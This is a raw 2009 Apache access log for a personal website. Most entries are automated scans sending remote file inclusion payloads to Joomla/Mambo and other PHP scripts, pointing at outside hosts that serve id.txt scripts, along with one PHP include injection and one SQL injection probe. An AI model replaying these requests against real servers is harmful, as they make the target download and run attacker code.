67.195.115.254 - - [30/Oct/2009:10:58:11 -0700] "GET /logs/access_080804.log HTTP/1.0" 200 2522218 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:58:16 -0700] "GET /logs/access_080620.log%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:58:16 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:58:17 -0700] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 200 15972 "-" "Mozilla/5.0" "www.dmulk.com"
147.46.234.66 - - [30/Oct/2009:10:58:20 -0700] "GET /modules/mod_calendar.php?absolute_path=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
147.46.234.66 - - [30/Oct/2009:10:58:20 -0700] "GET /logs//modules/mod_calendar.php?absolute_path=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
147.46.234.66 - - [30/Oct/2009:10:58:20 -0700] "GET /logs/access_080313.log//modules/mod_calendar.php?absolute_path=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:58:23 -0700] "GET /logs/access_080314.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.115.254 - - [30/Oct/2009:10:58:38 -0700] "GET /logs/access_090123.log HTTP/1.0" 200 3915545 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
203.200.95.142 - - [30/Oct/2009:10:58:44 -0700] "GET /logs/access_080521.log/xmlrpc.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [30/Oct/2009:10:58:44 -0700] "GET /xmlrpc.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [30/Oct/2009:10:58:45 -0700] "GET /logs/xmlrpc.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
147.46.234.66 - - [30/Oct/2009:10:59:07 -0700] "GET /logs/access_080313.log//modules/mod_calendar.php?absolute_path=http://family365.com/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
147.46.234.66 - - [30/Oct/2009:10:59:07 -0700] "GET /modules/mod_calendar.php?absolute_path=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
147.46.234.66 - - [30/Oct/2009:10:59:07 -0700] "GET /logs//modules/mod_calendar.php?absolute_path=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:59:12 -0700] "GET /logs/access_080812.log%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.181.243.6 - - [30/Oct/2009:10:59:52 -0700] "GET /logs/access_090409.log%20%20/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.shoppingxxxsource.com/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.148.238.69 - - [30/Oct/2009:10:59:55 -0700] "GET /logs/access_080608.log/administrator/index3.php?mosConfig_absolute_path=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.148.238.69 - - [30/Oct/2009:10:59:55 -0700] "GET /logs/access_080425.log/administrator/index3.php?mosConfig_absolute_path=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.148.238.69 - - [30/Oct/2009:10:59:55 -0700] "GET /logs/administrator/index3.php?mosConfig_absolute_path=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.98.252.9 - - [30/Oct/2009:10:59:56 -0700] "GET /include/write.php?dir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.148.238.69 - - [30/Oct/2009:10:59:57 -0700] "GET /administrator/index3.php?mosConfig_absolute_path=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.98.252.9 - - [30/Oct/2009:10:59:58 -0700] "GET /logs//include/write.php?dir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.98.252.9 - - [30/Oct/2009:10:59:58 -0700] "GET /logs/access_081007.log//include/write.php?dir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:11:00:29 -0700] "GET /logs/access_080123.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:11:00:29 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:11:00:30 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 200 15974 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.115.254 - - [30/Oct/2009:11:00:51 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:11:00:58 -0700] "GET /logs/access_080314.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:11:01:25 -0700] "GET /logs/access_080701.log//includes/mambo.php/mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:11:01:25 -0700] "GET /logs/access_080701.log//includes/mambo.php/mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:11:01:25 -0700] "GET /logs/access_080701.log//includes/mambo.php/mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:11:01:25 -0700] "GET /logs/access_080701.log//includes/mambo.php/mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:11:01:25 -0700] "GET /logs/access_080701.log//includes/mambo.php/mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:11:01:25 -0700] "GET /logs/access_080701.log//includes/mambo.php/mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:11:01:25 -0700] "GET /includes/mambo.php/mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:11:01:25 -0700] "GET /includes/mambo.php/mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:11:01:25 -0700] "GET /includes/mambo.php/mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:11:01:25 -0700] "GET /includes/mambo.php/mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:11:01:25 -0700] "GET /includes/mambo.php/mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:11:01:25 -0700] "GET /includes/mambo.php/mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:11:01:25 -0700] "GET /logs//includes/mambo.php/mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:11:01:25 -0700] "GET /logs/access_080701.log//includes/mambo.php/mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:11:01:25 -0700] "GET /logs//includes/mambo.php/mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:11:01:25 -0700] "GET /logs//includes/mambo.php/mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:11:01:25 -0700] "GET /logs//includes/mambo.php/mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:11:01:25 -0700] "GET /logs//includes/mambo.php/mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:11:01:25 -0700] "GET /logs//includes/mambo.php/mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:11:01:25 -0700] "GET /includes/mambo.php/mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:11:01:25 -0700] "GET /logs//includes/mambo.php/mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.251.99.2 - - [30/Oct/2009:11:01:27 -0700] "GET /logs/access_090721.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.angelcitytrading.com/css/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.121.169.156 - - [30/Oct/2009:11:02:03 -0700] "GET /logs/access_080529.log/administrator/index3.php?mosConfig_absolute_path=http://www.myluxurychalet.com/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.121.169.156 - - [30/Oct/2009:11:02:03 -0700] "GET /logs/administrator/index3.php?mosConfig_absolute_path=http://www.myluxurychalet.com/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.121.169.156 - - [30/Oct/2009:11:02:03 -0700] "GET /administrator/index3.php?mosConfig_absolute_path=http://www.myluxurychalet.com/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.121.169.156 - - [30/Oct/2009:11:02:03 -0700] "GET /logs/access_080327.log/administrator/index3.php?mosConfig_absolute_path=http://www.myluxurychalet.com/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.181.243.6 - - [30/Oct/2009:11:02:09 -0700] "GET /logs/access_090721.log%20%20/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.shoppingxxxsource.com/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
139.142.180.81 - - [30/Oct/2009:11:03:08 -0700] "GET /logs/access_090721.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.shoppingxxxsource.com/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.12.13.152 - - [30/Oct/2009:11:03:10 -0700] "GET /logs/access_090607.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.12.13.152 - - [30/Oct/2009:11:03:10 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.12.13.152 - - [30/Oct/2009:11:03:11 -0700] "GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 15989 "-" "Mozilla/5.0" "www.dmulk.com"
81.12.13.152 - - [30/Oct/2009:11:03:14 -0700] "GET /logs/access_080510.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:11:03:19 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:11:03:19 -0700] "GET /logs/access_080502.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:11:03:20 -0700] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.melawai.com//images/id1??? HTTP/1.1" 200 8276 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:11:03:22 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:11:03:22 -0700] "GET /logs/access_080502.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:11:03:22 -0700] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.melawai.com//images/id1??? HTTP/1.1" 200 8276 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:11:03:27 -0700] "GET /logs/access_080513.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.115.254 - - [30/Oct/2009:11:03:29 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_27/ HTTP/1.0" 200 1617 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:11:03:29 -0700] "GET /logs/access_080513.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.115.254 - - [30/Oct/2009:11:03:40 -0700] "GET /logs/access_090421.log HTTP/1.0" 200 4769357 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.115.254 - - [30/Oct/2009:11:03:53 -0700] "GET /logs/access_071227.log HTTP/1.0" 200 452672 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
202.88.229.100 - - [30/Oct/2009:11:04:36 -0700] "GET /logs/scriptsold.log//tools/send_reminders.php?noSet=0&includedir=http://www.artofgaming.it/site/rss/idd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.88.229.100 - - [30/Oct/2009:11:04:36 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.artofgaming.it/site/rss/idd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.88.229.100 - - [30/Oct/2009:11:04:36 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.artofgaming.it/site/rss/idd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.58.132.237 - - [30/Oct/2009:11:04:40 -0700] "GET /product.php?id=' HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:11:04:57 -0700] "GET /logs/access_080518.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:11:04:57 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:11:04:58 -0700] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 200 15971 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.18.203 - - [30/Oct/2009:11:05:06 -0700] "GET /logs/access_081007.log//bbs//skin/zero_vote/ask_password.php?dir=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.18.203 - - [30/Oct/2009:11:05:06 -0700] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.18.203 - - [30/Oct/2009:11:05:09 -0700] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.18.203 - - [30/Oct/2009:11:05:15 -0700] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.18.203 - - [30/Oct/2009:11:05:16 -0700] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.18.203 - - [30/Oct/2009:11:05:16 -0700] "GET /logs/access_081007.log//bbs//skin/zero_vote/ask_password.php?dir=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:11:05:16 -0700] "GET /logs/access_090515.log%20%20//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:11:05:16 -0700] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:11:05:17 -0700] "GET /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 200 15976 "-" "Mozilla/5.0" "www.dmulk.com"
79.148.238.69 - - [30/Oct/2009:11:05:19 -0700] "GET /logs/administrator/index3.php?mosConfig_absolute_path=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.148.238.69 - - [30/Oct/2009:11:05:19 -0700] "GET /administrator/index3.php?mosConfig_absolute_path=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.148.238.69 - - [30/Oct/2009:11:05:21 -0700] "GET /logs/access_090118.log/administrator/index3.php?mosConfig_absolute_path=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.193.15.3 - - [30/Oct/2009:11:05:28 -0700] "GET /logs/access_080503.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.148.238.69 - - [30/Oct/2009:11:05:36 -0700] "GET /logs/access_080930.log/administrator/index3.php?mosConfig_absolute_path=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.148.238.69 - - [30/Oct/2009:11:05:36 -0700] "GET /logs/access_080628.log/administrator/index3.php?mosConfig_absolute_path=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.115.254 - - [30/Oct/2009:11:05:47 -0700] "GET /logs/access_080907.log HTTP/1.0" 200 4266872 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:11:05:54 -0700] "GET /logs/access_080417.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.18.203 - - [30/Oct/2009:11:06:00 -0700] "GET /admin/classes/errors.php?error=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.18.203 - - [30/Oct/2009:11:06:00 -0700] "GET /logs/access_080504.log//admin/classes/errors.php?error=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.18.203 - - [30/Oct/2009:11:06:01 -0700] "GET /logs//admin/classes/errors.php?error=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.121.169.156 - - [30/Oct/2009:11:06:01 -0700] "GET /logs/access_090408.log/administrator/index3.php?mosConfig_absolute_path=http://www.myluxurychalet.com/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.121.169.156 - - [30/Oct/2009:11:06:04 -0700] "GET /administrator/index3.php?mosConfig_absolute_path=http://www.myluxurychalet.com/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.121.169.156 - - [30/Oct/2009:11:06:04 -0700] "GET /logs/administrator/index3.php?mosConfig_absolute_path=http://www.myluxurychalet.com/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
218.38.18.203 - - [30/Oct/2009:11:06:05 -0700] "GET /admin/classes/errors.php?error=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.18.203 - - [30/Oct/2009:11:06:07 -0700] "GET /logs/access_080504.log//admin/classes/errors.php?error=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.18.203 - - [30/Oct/2009:11:06:07 -0700] "GET /logs//admin/classes/errors.php?error=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.18.203 - - [30/Oct/2009:11:06:08 -0700] "GET /logs/access_080304.log//admin/classes/errors.php?error=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.18.203 - - [30/Oct/2009:11:06:18 -0700] "GET /logs/access_080304.log//admin/classes/errors.php?error=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.199.35.58 - - [30/Oct/2009:11:06:37 -0700] "GET /includes/mambo.php/mosConfig_absolute_path=http://indo.home.ro/idaaa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
218.38.18.203 - - [30/Oct/2009:11:06:37 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.18.203 - - [30/Oct/2009:11:06:37 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
